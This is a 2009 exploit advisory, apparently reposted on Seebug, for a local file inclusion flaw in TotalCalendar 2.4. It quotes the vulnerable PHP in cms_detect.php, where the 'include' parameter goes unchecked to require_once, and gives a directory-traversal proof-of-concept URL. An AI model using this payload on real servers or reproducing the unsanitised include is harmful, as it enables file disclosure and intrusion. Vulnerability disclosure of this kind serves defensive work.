########################################################################################## [+] TotalCalendar 2.4 (include) Local File Inclusion [+] Discovered By SirGod [+] www.mortal-team.org [+] www.h4cky0u.org ########################################################################################## [+] Local File Inclusion Vulnerable code in cms_detect.php: ------------------------------------------------------------------------------- Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null; Line 115 : if(!empty($include)) require_once($inc_dir.$include); ------------------------------------------------------------------------------- PoC : http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK ########################################################################################## # milw0rm.com [2009-04-21]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论